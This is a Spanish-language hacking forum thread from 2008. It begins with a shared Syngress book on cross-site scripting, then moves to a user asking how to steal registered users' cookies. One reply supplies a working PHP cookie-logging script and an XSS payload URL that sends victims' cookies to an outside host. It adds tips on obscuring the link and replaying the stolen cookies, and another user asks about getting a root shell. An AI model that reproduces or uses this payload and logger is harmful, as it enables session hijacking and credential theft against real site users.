hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
07 de Octubre de 2008, 04:25:47
Noticias: Nomina a tus preferidos para los pOrtal Hacker Awards 2008
Para ver este enlace Registrate o Inicia Sesion
aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Syngress: Cross Site Scripting Attacks XSS, Exploits and Defense
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Syngress: Cross Site Scripting Attacks XSS, Exploits and Defense  (Leído 658 veces)
Sknight
Colaborador
****
Desconectado Desconectado

Mensajes: 794



Ver Perfil
« : 10 de Abril de 2008, 10:42:43 »

Vengador de las sombras ya posteo un pdf sobre esta técnica: Cross Site Scripting.

Sin embargo aquí les dejo un pdf perteneciente a
Para ver este enlace Registrate o Inicia Sesion
Syngress
. Está subido a mi cuenta de mediafire, con lo cual el link no caducará. Sin nada más que hablar:



Idioma: Inglés

Páginas: 482

Descarga:
Para ver este enlace Registrate o Inicia Sesion
XSS Attacks, Exploits and Defense.pdf
« Última modificación: 10 de Abril de 2008, 10:43:32 por N.O.X. » En línea




Para ver este enlace Registrate o Inicia Sesion
No Tech Hacking
|
Para ver este enlace Registrate o Inicia Sesion
You´ll never walk alone
|
Para ver este enlace Registrate o Inicia Sesion
Benchmark SuperPI


Para ver este enlace Registrate o Inicia Sesion
F.A.Q. de Hardware
|
Para ver este enlace Registrate o Inicia Sesion
HTTP Al descubierto

vengador de las sombras
Moderador
*****
Desconectado Desconectado

Mensajes: 949


Fl4m1ng 0ur SkillZ TeaM


Ver Perfil
« Respuesta #1 : 10 de Abril de 2008, 10:46:44 »

Por fin comienzan a volver los grandes aportes!!.

Descargando... Sigue así Tongue.
En línea


Para ver este enlace Registrate o Inicia Sesion
Overload in the Net (Mi blog)

-----------------------------------------

Para ver este enlace Registrate o Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Iritsi
NZ1
*
Desconectado Desconectado

Mensajes: 29


Ver Perfil
« Respuesta #2 : 13 de Abril de 2008, 10:28:01 »

¿Qué es este ataque?¿En que se basan los ataque XSS?

Lo siento soy nuevo.
En línea

Nunca podran robarnos nuestras mentes.
vengador de las sombras
Moderador
*****
Desconectado Desconectado

Mensajes: 949


Fl4m1ng 0ur SkillZ TeaM


Ver Perfil
« Respuesta #3 : 13 de Abril de 2008, 10:53:24 »

Ehm... Igual si te lees el manual lo comprendes ¬¬''


Se trata de una vulnerabilidad en la cual un atacante puede inyectar código, el cual será interpretado como si fuese código legítimo de la web.

Eso es a muy grandes rasgos de lo que se trata... Leete el manual y si tienes alguna duda, posteala.
En línea


Para ver este enlace Registrate o Inicia Sesion
Overload in the Net (Mi blog)

-----------------------------------------

Para ver este enlace Registrate o Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Iritsi
NZ1
*
Desconectado Desconectado

Mensajes: 29


Ver Perfil
« Respuesta #4 : 13 de Abril de 2008, 11:06:54 »

Si inyectas codigos html a traves de una alerta script, pero si yo en ese caso no quisiera inyectar un codigo html sino una link externo o incluso robo credencial de coockies, por ejemplo en un XSS en un formulario de registro d eloging inyectar la coockie de uno de los user registrados podria hacerlo, osea robo de credenciales, o àra hacer esto depende de las tres clases del ataque XSS, tendria que ser -0  para ejecutar código remotamente con los permisos de otro usuario, si e leido el mnaual pero esta en ingles y es bastante dificil de leer.

un saludo
En línea

Nunca podran robarnos nuestras mentes.
Sknight
Colaborador
****
Desconectado Desconectado

Mensajes: 794



Ver Perfil
« Respuesta #5 : 14 de Abril de 2008, 08:43:32 »

-0 ... de donde has salido tu... En fin a responder se ha dicho.

Según lo que veo  tu quieres hacer un cookie poisoning.

Queremos falsificar las cookies de los usuarios registrados, así que evidentemente tendremos que capturarlas no?

Para ello hacemos un capturador de cookies y lo subimos a un host con privilegios 777.


Para ver este enlace Registrate o Inicia Sesion
Código por _mÙëK§™_


Código:
<?php
$archivo 
fopen('coockieslog.htm','a');//Aquí puedes cambiar el nombre del archivo
$cookie $_GET['c'];
$usuario $_GET['id'];
$ip getenv ('REMOTE_ADDR');
$re $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo'<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' 
.$ip'
 Fecha y Hora: ' 
.$fecha'</hr>');
fclose($archivo);
?>


Ahora el código que llenará nuestro capturador :P

Código:
http://www.loginvulnerable/login.php?nombre del textbox=<script>window.location='http://explicacion.com/coockieslog.php?cookie='+document.cookie;</script>&varia depende del nombre del botón=;

Y ahora solo queda esperar. Para disimular la url te recomiendo usar esto:
Para ver este enlace Registrate o Inicia Sesion
http://meyerweb.com/eric/tools/dencoder/


Después solo queda usar el cookie editor para modificar tu cookie por alguna de las capturadas

Cookie Editor:
Para ver este enlace Registrate o Inicia Sesion
https://addons.mozilla.org/es-ES/firefox/addon/573


« Última modificación: 14 de Abril de 2008, 11:44:20 por N.O.X. » En línea




Para ver este enlace Registrate o Inicia Sesion
No Tech Hacking
|
Para ver este enlace Registrate o Inicia Sesion
You´ll never walk alone
|
Para ver este enlace Registrate o Inicia Sesion
Benchmark SuperPI


Para ver este enlace Registrate o Inicia Sesion
F.A.Q. de Hardware
|
Para ver este enlace Registrate o Inicia Sesion
HTTP Al descubierto

Iritsi
NZ1
*
Desconectado Desconectado

Mensajes: 29


Ver Perfil
« Respuesta #6 : 14 de Abril de 2008, 11:38:44 »

Asi es perfecto!;) Y si quiero inyecctar a traves de un XXS osea un script de alerta en este caso un link externo para que sea ejecutado sobre ese nivel -0, ya que e sel unico que ejecuta comandos en e servidor a parte de el navegador ¿Como sería? En el link esterno nos encontramos con una shell root!;)

saludos
En línea

Nunca podran robarnos nuestras mentes.
kamui23
Colaborador
****
Desconectado Desconectado

Mensajes: 732



Ver Perfil
« Respuesta #7 : 14 de Abril de 2008, 11:48:13 »

Olé tus narices: te has leído el manual y has preguntado una duda razonable. Esta forma de preguntar habria que enmarcarla. Cheesy.

Edit de N.O.X. : Mis felicidades para ti iristi, hacía tiempo que no respondía con tanto gusto a un tema... esta es una de las mejores formas de subir el nivel de una sección, preguntando dudas razonables. (@contestando tu segunda pregunta...)
« Última modificación: 14 de Abril de 2008, 11:51:28 por N.O.X. » En línea

Busco una meta: conseguir lo que nadie ha conseguido. Y hacerlo en la mitad de tiempo.


No respondo preguntas por mensaje privado. para dudas, escribid en el foro, por favor.
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online